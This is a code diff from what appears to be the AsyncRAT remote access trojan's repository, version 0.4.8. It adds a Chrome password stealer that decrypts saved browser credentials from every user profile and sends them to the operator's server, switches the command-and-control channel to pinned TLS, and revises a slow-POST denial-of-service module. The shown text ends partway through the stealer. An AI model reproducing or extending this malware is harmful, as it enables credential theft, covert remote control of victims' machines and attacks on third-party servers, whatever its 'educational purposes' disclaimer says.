this.label1 = new System.Windows.Forms.Label();
this.groupBox1 = new System.Windows.Forms.GroupBox();
this.label2 = new System.Windows.Forms.Label();
this.textPassword = new System.Windows.Forms.TextBox();
this.button1 = new System.Windows.Forms.Button();
this.groupBox1.SuspendLayout();
this.SuspendLayout();
@ -56,36 +54,18 @@
//
// groupBox1
//
this.groupBox1.Controls.Add(this.label2);
this.groupBox1.Controls.Add(this.textPassword);
this.groupBox1.Controls.Add(this.label1);
this.groupBox1.Controls.Add(this.textPorts);
this.groupBox1.Location = new System.Drawing.Point(13, 13);
this.groupBox1.Name = "groupBox1";
this.groupBox1.Size = new System.Drawing.Size(558, 160);
this.groupBox1.Size = new System.Drawing.Size(558, 111);
this.groupBox1.TabIndex = 2;
this.groupBox1.TabStop = false;
this.groupBox1.Text = "Settings";
//
// label2
//
this.label2.AutoSize = true;
this.label2.Location = new System.Drawing.Point(6, 103);
this.label2.Name = "label2";
this.label2.Size = new System.Drawing.Size(78, 20);
this.label2.TabIndex = 3;
this.label2.Text = "Password";
//
// textPassword
//
this.textPassword.Location = new System.Drawing.Point(129, 100);
this.textPassword.Name = "textPassword";
this.textPassword.Size = new System.Drawing.Size(423, 26);
this.textPassword.TabIndex = 2;
//
// button1
//
this.button1.Location = new System.Drawing.Point(23, 203);
this.button1.Location = new System.Drawing.Point(23, 146);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(542, 50);
this.button1.TabIndex = 0;
@ -97,7 +77,7 @@
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(583, 265);
this.ClientSize = new System.Drawing.Size(583, 226);
this.Controls.Add(this.button1);
this.Controls.Add(this.groupBox1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
@ -118,9 +98,7 @@
#endregion
private System.Windows.Forms.Label label1;
private System.Windows.Forms.GroupBox groupBox1;
private System.Windows.Forms.Label label2;
private System.Windows.Forms.Button button1;
public System.Windows.Forms.TextBox textPorts;
public System.Windows.Forms.TextBox textPassword;
}
}

21
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs
View File

@ -2,6 +2,9 @@
using System.Windows.Forms;
using System.IO;
using System.Diagnostics;
using AsyncRAT_Sharp.Helper;
using System.Security.Cryptography.X509Certificates;
namespace AsyncRAT_Sharp.Forms
{
public partial class FormPorts : Form
@ -21,18 +24,26 @@ namespace AsyncRAT_Sharp.Forms
if (Properties.Settings.Default.Ports.Length > 0)
textPorts.Text = Properties.Settings.Default.Ports;
if (Properties.Settings.Default.Password.Length > 0)
textPassword.Text = Properties.Settings.Default.Password;
this.Text = $"{Settings.Version} | Welcome {Environment.UserName}";
if (!File.Exists(Settings.CertificatePath))
{
using (FormCertificate formCertificate = new FormCertificate())
{
formCertificate.ShowDialog();
}
}
else
{
Settings.ServerCertificate = new X509Certificate2(Settings.CertificatePath);
}
}
private void button1_Click(object sender, EventArgs e)
{
if (textPorts.Text.Length > 0 && textPassword.Text.Length > 0)
if (textPorts.Text.Length > 0)
{
Properties.Settings.Default.Ports = textPorts.Text;
Properties.Settings.Default.Password = textPassword.Text;
Properties.Settings.Default.Save();
isOK = true;
this.Close();

1
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs
View File

@ -7,6 +7,7 @@ using System.IO;
using System.Windows.Forms;
using System.Threading;
using System.Threading.Tasks;
using AsyncRAT_Sharp.Helper;
namespace AsyncRAT_Sharp.Handle_Packet
{

1
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs
View File

@ -1,4 +1,5 @@
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.Helper;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using System;

13
AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs
View File

@ -5,6 +5,8 @@ using System.Diagnostics;
using System.Drawing;
using AsyncRAT_Sharp.Forms;
using System.Security.Cryptography;
using System.IO;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet
{
@ -19,7 +21,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
byte[] data = (byte[])array[0];
client = (Clients)array[1];
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(Settings.AES.Decrypt(data));
unpack_msgpack.DecodeFromBytes(data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "ClientInfo":
@ -58,6 +60,15 @@ namespace AsyncRAT_Sharp.Handle_Packet
break;
}
case "recoveryPassword":
{
if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID)))
Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID));
File.WriteAllText(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID + "\\ChromePassowrds.txt"), unpack_msgpack.ForcePathObject("Password").AsString);
new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} recovered passwords successfully", Color.Purple);
break;
}
case "Received":
{
new HandleListView().Received(client);

16
AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs
View File

@ -1,11 +1,13 @@
using System;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp
namespace AsyncRAT_Sharp.Helper
{
static class Methods
public static class Methods
{
private const string Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
public static string BytesToString(long byteCount)
{
string[] suf = { "B", "KB", "MB", "GB", "TB", "PB", "EB" };
@ -25,5 +27,15 @@ namespace AsyncRAT_Sharp
o.Opacity += 0.05;
}
}
public static Random Random = new Random();
public static string GetRandomString(int length)
{
StringBuilder randomName = new StringBuilder(length);
for (int i = 0; i < length; i++)
randomName.Append(Alphabet[Random.Next(Alphabet.Length)]);
return randomName.ToString();
}
}
}

12
AsyncRAT-C#/AsyncRAT-Sharp/Program.cs
View File

@ -4,6 +4,18 @@ using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
// │ Author : NYAN CAT
// │ Name : AsyncRAT // Simple RAT
// Contact Me : https://github.com/NYAN-x-CAT
// This program Is distributed for educational purposes only.
// Credits;
// Serialization @ymofen
// StreamLibrary @Dergan
// Special Thanks MaxXor@hf gigajew@hf
namespace AsyncRAT_Sharp
{
static class Program

10
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs generated
View File

@ -174,6 +174,16 @@ namespace AsyncRAT_Sharp.Properties {
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
internal static System.Drawing.Bitmap key {
get {
object obj = ResourceManager.GetObject("key", resourceCulture);
return ((System.Drawing.Bitmap)(obj));
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>

7
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx
View File

@ -154,6 +154,9 @@
<data name="filemanager" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\filemanager.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="uac" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="remotedesktop" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\remotedesktop.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
@ -187,7 +190,7 @@
<data name="visit" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="uac" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
<data name="key" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\key.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
</root>

12
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs generated
View File

@ -35,18 +35,6 @@ namespace AsyncRAT_Sharp.Properties {
}
}
[global::System.Configuration.UserScopedSettingAttribute()]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Configuration.DefaultSettingValueAttribute("")]
public string Password {
get {
return ((string)(this["Password"]));
}
set {
this["Password"] = value;
}
}
[global::System.Configuration.UserScopedSettingAttribute()]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Configuration.DefaultSettingValueAttribute("")]

3
AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings
View File

@ -5,9 +5,6 @@
<Setting Name="Ports" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="Password" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>
<Setting Name="DNS" Type="System.String" Scope="User">
<Value Profile="(Default)" />
</Setting>

11
AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config
View File

@ -11,22 +11,19 @@
<userSettings>
<AsyncRAT_Sharp.Properties.Settings>
<setting name="Ports" serializeAs="String">
<value/>
</setting>
<setting name="Password" serializeAs="String">
<value/>
<value />
</setting>
<setting name="DNS" serializeAs="String">
<value/>
<value />
</setting>
<setting name="Filename" serializeAs="String">
<value/>
<value />
</setting>
<setting name="Notification" serializeAs="String">
<value>False</value>
</setting>
<setting name="Mutex" serializeAs="String">
<value/>
<value />
</setting>
</AsyncRAT_Sharp.Properties.Settings>
</userSettings>

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 828 B

11
AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
View File

@ -1,19 +1,22 @@
using AsyncRAT_Sharp.Cryptography;
using AsyncRAT_Sharp.Sockets;
using System.Collections.Generic;
using System.IO;
using System.Security.Cryptography.X509Certificates;
using System.Windows.Forms;
namespace AsyncRAT_Sharp
{
class Settings
public static class Settings
{
public static List<Clients> Online = new List<Clients>();
public static List<string> Blocked = new List<string>();
public static string Port { get; set; }
public static long Sent { get; set; }
public static long Received { get; set; }
public static string Password { get; set; }
public static Aes256 AES{ get; set; }
public static readonly string Version = "AsyncRAT 0.4.7";
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.4.8";
}
}

79
AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
View File

@ -9,12 +9,15 @@ using System.Diagnostics;
using System.Threading;
using AsyncRAT_Sharp.MessagePack;
using System.Text;
using System.Net.Security;
using System.Security.Authentication;
namespace AsyncRAT_Sharp.Sockets
{
public class Clients
{
public Socket ClientSocket { get; set; }
public SslStream ClientSslStream { get; set; }
public ListViewItem LV { get; set; }
public ListViewItem LV2 { get; set; }
public string ID { get; set; }
@ -23,15 +26,29 @@ namespace AsyncRAT_Sharp.Sockets
private bool ClientBufferRecevied { get; set; }
private MemoryStream ClientMS { get; set; }
public object SendSync { get; } = new object();
private object EndSendSync { get; } = new object();
public long BytesRecevied { get; set; }
public Clients(Socket socket)
{
ClientSocket = socket;
ClientSslStream = new SslStream(new NetworkStream(ClientSocket, true), false);
ClientSslStream.BeginAuthenticateAsServer(Settings.ServerCertificate, false, SslProtocols.Tls, false, EndAuthenticate, null);
}
private void EndAuthenticate(IAsyncResult ar)
{
try
{
ClientSslStream.EndAuthenticateAsServer(ar);
ClientBuffer = new byte[4];
ClientMS = new MemoryStream();
ClientSocket.BeginReceive(ClientBuffer, 0, ClientBuffer.Length, SocketFlags.None, ReadClientData, null);
ClientSslStream.BeginRead(ClientBuffer, 0, ClientBuffer.Length, ReadClientData, null);
}
catch
{
ClientSslStream?.Dispose();
ClientSocket?.Dispose();
}
}
public async void ReadClientData(IAsyncResult ar)
@ -45,12 +62,14 @@ namespace AsyncRAT_Sharp.Sockets
}
else
{
int Recevied = ClientSocket.EndReceive(ar);
int Recevied = ClientSslStream.EndRead(ar);
if (Recevied > 0)
{
await ClientMS.WriteAsync(ClientBuffer, 0, Recevied);
if (!ClientBufferRecevied)
{
await ClientMS.WriteAsync(ClientBuffer, 0, ClientBuffer.Length);
if (ClientMS.Length == 4)
{
ClientBuffersize = BitConverter.ToInt32(ClientMS.ToArray(), 0);
ClientMS.Dispose();
ClientMS = new MemoryStream();
@ -61,14 +80,14 @@ namespace AsyncRAT_Sharp.Sockets
ClientBufferRecevied = true;
}
}
}
else
{
await ClientMS.WriteAsync(ClientBuffer, 0, Recevied);
Settings.Received += Recevied;
BytesRecevied += Recevied;
if (ClientMS.Length == ClientBuffersize)
{
ThreadPool.QueueUserWorkItem(Packet.Read, new object[] {ClientMS.ToArray(), this });
ThreadPool.QueueUserWorkItem(Packet.Read, new object[] { ClientMS.ToArray(), this });
ClientBuffer = new byte[4];
ClientMS.Dispose();
ClientMS = new MemoryStream();
@ -77,7 +96,7 @@ namespace AsyncRAT_Sharp.Sockets
else
ClientBuffer = new byte[ClientBuffersize - ClientMS.Length];
}
ClientSocket.BeginReceive(ClientBuffer, 0, ClientBuffer.Length, SocketFlags.None, ReadClientData, null);
ClientSslStream.BeginRead(ClientBuffer, 0, ClientBuffer.Length, ReadClientData, null);
}
else
{
@ -121,6 +140,7 @@ namespace AsyncRAT_Sharp.Sockets
try
{
ClientSslStream?.Dispose();
ClientSocket?.Dispose();
ClientMS?.Dispose();
}
@ -141,12 +161,15 @@ namespace AsyncRAT_Sharp.Sockets
if ((byte[])msg == null) return;
byte[] buffer = Settings.AES.Encrypt((byte[])msg);
byte[] buffer = (byte[])msg;
byte[] buffersize = BitConverter.GetBytes(buffer.Length);
ClientSocket.Poll(-1, SelectMode.SelectWrite);
ClientSocket.BeginSend(buffersize, 0, buffersize.Length, SocketFlags.None, EndSend, null);
ClientSocket.BeginSend(buffer, 0, buffer.Length, SocketFlags.None, EndSend, null);
ClientSslStream.Write(buffersize, 0, buffersize.Length);
ClientSslStream.Write(buffer, 0, buffer.Length);
ClientSslStream.Flush();
Debug.WriteLine("/// Server Sent " + buffer.Length.ToString() + " Bytes ///");
Settings.Sent += buffer.Length;
}
catch
{
@ -157,47 +180,22 @@ namespace AsyncRAT_Sharp.Sockets
}
}
private void EndSend(IAsyncResult ar)
{
lock (EndSendSync)
{
try
{
if (!ClientSocket.Connected)
{
Disconnected();
return;
}
int sent = 0;
sent = ClientSocket.EndSend(ar);
Debug.WriteLine("/// Server Sent " + sent.ToString() + " Bytes ///");
Settings.Sent += sent;
}
catch
{
Disconnected();
return;
}
}
}
public void Ping(object obj)
{
lock (SendSync)
{
lock (EndSendSync)
{
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = "This is a ping!";
byte[] buffer = Settings.AES.Encrypt(msgpack.Encode2Bytes());
byte[] buffer = msgpack.Encode2Bytes();
byte[] buffersize = BitConverter.GetBytes(buffer.Length);
ClientSocket.Poll(-1, SelectMode.SelectWrite);
ClientSocket.Send(buffersize, 0, buffersize.Length, SocketFlags.None);
ClientSocket.Send(buffer, 0, buffer.Length, SocketFlags.None);
ClientSslStream.Write(buffersize, 0, buffersize.Length);
ClientSslStream.Write(buffer, 0, buffer.Length);
ClientSslStream.Flush();
}
catch
{
@ -206,7 +204,6 @@ namespace AsyncRAT_Sharp.Sockets
}
}
}
}
}
}

1
AsyncRAT-C#/AsyncRAT-Sharp/packages.config
View File

@ -1,4 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="BouncyCastle" version="1.8.5" targetFramework="net46" />
<package id="Mono.Cecil" version="0.10.3" targetFramework="net46" />
</packages>

5
AsyncRAT-C#/Client/Client.csproj
View File

@ -72,10 +72,13 @@
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Security" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.XML" />
</ItemGroup>
<ItemGroup>
<Compile Include="Cryptography\Aes256.cs" />
<Compile Include="Cryptography\Sha256.cs" />
<Compile Include="Handle Packet\HandleBotKiller.cs" />
<Compile Include="Handle Packet\HandleDos.cs" />
<Compile Include="Handle Packet\HandleFileManager.cs" />
@ -99,6 +102,8 @@
<Compile Include="MessagePack\WriteTools.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Recovery\Recovery.cs" />
<Compile Include="Recovery\SQLiteHandler.cs" />
<Compile Include="Settings.cs" />
<Compile Include="Sockets\ClientSocket.cs" />
<Compile Include="StreamLibrary\Enums.cs" />

33
AsyncRAT-C#/Client/Cryptography/Sha256.cs Normal file
View File

@ -0,0 +1,33 @@
using System.Security.Cryptography;
using System.Text;
namespace Client.Cryptography
{
public static class Sha256
{
public static string ComputeHash(string input)
{
byte[] data = Encoding.UTF8.GetBytes(input);
using (SHA256Managed sha = new SHA256Managed())
{
data = sha.ComputeHash(data);
}
StringBuilder hash = new StringBuilder();
foreach (byte _byte in data)
hash.Append(_byte.ToString("X2"));
return hash.ToString().ToUpper();
}
public static byte[] ComputeHash(byte[] input)
{
using (SHA256Managed sha = new SHA256Managed())
{
return sha.ComputeHash(input);
}
}
}
}

13
AsyncRAT-C#/Client/Handle Packet/HandleDos.cs
View File

@ -30,7 +30,7 @@ namespace Client.Handle_Packet
host = new Uri(unpack_msgpack.ForcePathObject("Host").AsString).DnsSafeHost;
port = Convert.ToInt32(unpack_msgpack.ForcePathObject("port").AsString);
timeout = Convert.ToInt32(unpack_msgpack.ForcePathObject("timeout").AsString) * 60;
List<TcpClient> listOfClients = new List<TcpClient>();
List<Socket> SocketList = new List<Socket>();
TimeSpan timespan = TimeSpan.FromSeconds(timeout);
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
@ -42,11 +42,12 @@ namespace Client.Handle_Packet
{
try
{
TcpClient tcp = new TcpClient(host.ToString(), port);
listOfClients.Add(tcp);
Socket tcp = new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
tcp.Connect(host.ToString(), port);
SocketList.Add(tcp);
string post = $"POST / HTTP/1.1\r\nHost: {host} \r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: {userAgents[new Random().Next(userAgents.Length)]}\r\nContent-length: 5235\r\n\r\n";
byte[] buffer = Encoding.UTF8.GetBytes(post);
tcp.Client.Send(buffer, 0, buffer.Length, SocketFlags.None);
tcp.Send(buffer, 0, buffer.Length, SocketFlags.None);
}
catch
{
@ -57,9 +58,9 @@ namespace Client.Handle_Packet
}
Thread.Sleep(1000);
foreach (TcpClient tcp in listOfClients.ToList())
foreach (Socket tcp in SocketList.ToList())
{
tcp?.Client.Dispose();
tcp?.Dispose();
}
}

28
AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs
View File

@ -9,6 +9,10 @@ using System.Linq;
using System.Text;
using System.Diagnostics;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;
namespace Client.Handle_Packet
{
public class FileManager
@ -97,6 +101,8 @@ namespace Client.Handle_Packet
SendBufferSize = 50 * 1024,
};
Client.Connect(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[1]));
SslStream SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "socketDownload";
@ -104,7 +110,7 @@ namespace Client.Handle_Packet
msgpack.ForcePathObject("DWID").AsString = dwid;
msgpack.ForcePathObject("File").AsString = file;
msgpack.ForcePathObject("Size").AsString = new FileInfo(file).Length.ToString();
ChunkSend(Settings.aes256.Encrypt(msgpack.Encode2Bytes()), Client);
ChunkSend(msgpack.Encode2Bytes(), Client, SslClient);
MsgPack msgpack2 = new MsgPack();
@ -113,7 +119,7 @@ namespace Client.Handle_Packet
msgpack2.ForcePathObject("DWID").AsString = dwid;
msgpack2.ForcePathObject("Name").AsString = Path.GetFileName(file);
msgpack2.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(file));
ChunkSend(Settings.aes256.Encrypt(msgpack2.Encode2Bytes()), Client);
ChunkSend(msgpack2.Encode2Bytes(), Client, SslClient);
Client.Shutdown(SocketShutdown.Both);
Client.Dispose();
@ -124,17 +130,17 @@ namespace Client.Handle_Packet
}
}
private void ChunkSend(byte[] msg, Socket client)
private void ChunkSend(byte[] msg, Socket client, SslStream ssl)
{
try
{
byte[] buffersize = BitConverter.GetBytes(msg.Length);
client.Poll(-1, SelectMode.SelectWrite);
client.Send(buffersize);
ssl.Write(buffersize);
ssl.Flush();
int chunkSize = 50 * 1024;
byte[] chunk = new byte[chunkSize];
int SendPackage;
using (MemoryStream buffereReader = new MemoryStream(msg))
{
BinaryReader binaryReader = new BinaryReader(buffereReader);
@ -143,7 +149,8 @@ namespace Client.Handle_Packet
{
chunk = binaryReader.ReadBytes(chunkSize);
bytesToRead -= chunkSize;
SendPackage = client.Send(chunk);
ssl.Write(chunk);
ssl.Flush();
} while (bytesToRead > 0);
binaryReader.Dispose();
@ -154,5 +161,14 @@ namespace Client.Handle_Packet
return;
}
}
private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return Settings.ServerCertificate.Equals(certificate);
}
}
}

21
AsyncRAT-C#/Client/Handle Packet/HandleRemoteDesktop.cs
View File

@ -10,6 +10,9 @@ using Client.Helper;
using System;
using Client.StreamLibrary.UnsafeCodecs;
using Client.StreamLibrary;
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;
using System.Security.Authentication;
namespace Client.Handle_Packet
{
@ -22,6 +25,9 @@ namespace Client.Handle_Packet
Socket Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
Client.Connect(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.Client.RemoteEndPoint.ToString().Split(':')[1]));
SslStream SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
string hwid = Methods.HWID();
IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(quality);
while (Client.Connected)
@ -42,8 +48,10 @@ namespace Client.Handle_Packet
msgpack.ForcePathObject("ID").AsString = hwid;
msgpack.ForcePathObject("Stream").SetAsBytes(stream.ToArray());
Client.Send(BitConverter.GetBytes(Settings.aes256.Encrypt(msgpack.Encode2Bytes()).Length));
Client.Send(Settings.aes256.Encrypt(msgpack.Encode2Bytes()));
SslClient.Write(BitConverter.GetBytes(msgpack.Encode2Bytes().Length));
SslClient.Write(msgpack.Encode2Bytes());
SslClient.Flush();
Thread.Sleep(100);
}
}
bmp.UnlockBits(bmpData);
@ -66,5 +74,14 @@ namespace Client.Handle_Packet
}
catch { return new Bitmap(rect.Width, rect.Height); }
}
private bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return Settings.ServerCertificate.Equals(certificate);
}
}
}

9
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -7,6 +7,7 @@ using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Windows.Forms;
using Client.Recovery;
namespace Client.Handle_Packet
{
@ -19,7 +20,7 @@ namespace Client.Handle_Packet
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(Settings.aes256.Decrypt((byte[])data));
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
@ -55,6 +56,12 @@ namespace Client.Handle_Packet
break;
}
case "recoveryPassword":
{
new Recovery.Recovery();
break;
}
case "defender":
{
new HandleWindowsDefender();

4
AsyncRAT-C#/Client/Program.cs
View File

@ -11,6 +11,10 @@ using Client.Helper;
// This program Is distributed for educational purposes only.
// Credits;
// Serialization @ymofen
// StreamLibrary @Dergan
// Special Thanks MaxXor@hf gigajew@hf
namespace Client
{

219
AsyncRAT-C#/Client/Recovery/Recovery.cs Normal file
View File

@ -0,0 +1,219 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using Client.MessagePack;
using Client.Sockets;
namespace Client.Recovery
{
internal class Recovery
{
public string Pass;
public void recoverAll()
{
recoverChrome();
}
public Recovery()
{
this.Drive = Drive = new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory));
recoverAll();
if (Pass.Length > 1)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
msgpack.ForcePathObject("Password").AsString = Pass;
ClientSocket.Send(msgpack.Encode2Bytes());
}
}
public DriveInfo Drive;
private bool isWindowsXP()
{
return (Environment.OSVersion.Version.Major == 5);
}
private string[] GetAppDataFolders()
{
List<string> iList = new List<string>();
if (isWindowsXP())
{
foreach (string Dir in Directory.GetDirectories(Drive.RootDirectory.FullName + @"Documents and Settings\", "*", SearchOption.TopDirectoryOnly))
iList.Add(Dir + "Application Data");
}
else
foreach (string Dir in Directory.GetDirectories(Drive.RootDirectory.FullName + @"Users\", "*", SearchOption.TopDirectoryOnly))
{
DirectoryInfo dirInfo = new DirectoryInfo(Dir);
iList.Add(Drive.RootDirectory.FullName + @"Users\" + dirInfo.Name + @"\AppData");
}
return iList.ToArray();
}
[DllImport("Crypt32.dll", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CryptProtectData(
ref DATA_BLOB pDataIn,
String szDataDescr,
ref DATA_BLOB pOptionalEntropy,
IntPtr pvReserved,
ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
CryptProtectFlags dwFlags,
ref DATA_BLOB pDataOut
);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct DATA_BLOB
{
public int cbData;
public IntPtr pbData;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct CRYPTPROTECT_PROMPTSTRUCT
{
public int cbSize;
public CryptProtectPromptFlags dwPromptFlags;
public IntPtr hwndApp;
public String szPrompt;
}
[Flags]
private enum CryptProtectPromptFlags
{
// prompt on unprotect
CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0x1,
// prompt on protect
CRYPTPROTECT_PROMPT_ON_PROTECT = 0x2
}
[Flags]
private enum CryptProtectFlags
{
// for remote-access situations where ui is not an option
// if UI was specified on protect or unprotect operation, the call
// will fail and GetLastError() will indicate ERROR_PASSWORD_RESTRICTION
CRYPTPROTECT_UI_FORBIDDEN = 0x1,
// per machine protected data -- any user on machine where CryptProtectData
// took place may CryptUnprotectData
CRYPTPROTECT_LOCAL_MACHINE = 0x4,
// force credential synchronize during CryptProtectData()
// Synchronize is only operation that occurs during this operation
CRYPTPROTECT_CRED_SYNC = 0x8,
// Generate an Audit on protect and unprotect operations
CRYPTPROTECT_AUDIT = 0x10,
// Protect data with a non-recoverable key
CRYPTPROTECT_NO_RECOVERY = 0x20,
// Verify the protection of a protected blob
CRYPTPROTECT_VERIFY_PROTECTION = 0x40
}
[
DllImport("Crypt32.dll",
SetLastError = true,
CharSet = System.Runtime.InteropServices.CharSet.Auto)
]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CryptUnprotectData(
ref DATA_BLOB pDataIn,
StringBuilder szDataDescr,
ref DATA_BLOB pOptionalEntropy,
IntPtr pvReserved,
ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
CryptProtectFlags dwFlags,
ref DATA_BLOB pDataOut
);
private string Decrypt(byte[] Datas)
{
try
{
DATA_BLOB inj, Ors = new DATA_BLOB();
DATA_BLOB asd = new DATA_BLOB();
GCHandle Ghandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
inj.pbData = Ghandle.AddrOfPinnedObject();
inj.cbData = Datas.Length;
Ghandle.Free();
CRYPTPROTECT_PROMPTSTRUCT asdf = new CRYPTPROTECT_PROMPTSTRUCT();
string aha = string.Empty;
CryptUnprotectData(ref inj, null, ref asd, default(IntPtr), ref asdf, 0, ref Ors);
// ref DATA_BLOB pDataIn,
//StringBuilder szDataDescr,
// ref DATA_BLOB pOptionalEntropy,
// IntPtr pvReserved,
// ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
// CryptProtectFlags dwFlags,
// ref DATA_BLOB pDataOut
byte[] Returned = new byte[Ors.cbData + 1];
Marshal.Copy(Ors.pbData, Returned, 0, Ors.cbData);
string TheString = Encoding.UTF8.GetString(Returned);
return TheString.Substring(0, TheString.Length - 1);
}
catch
{
return "";
}
}
public void recoverChrome()
{
try
{
foreach (string AppData in GetAppDataFolders())
{
try
{
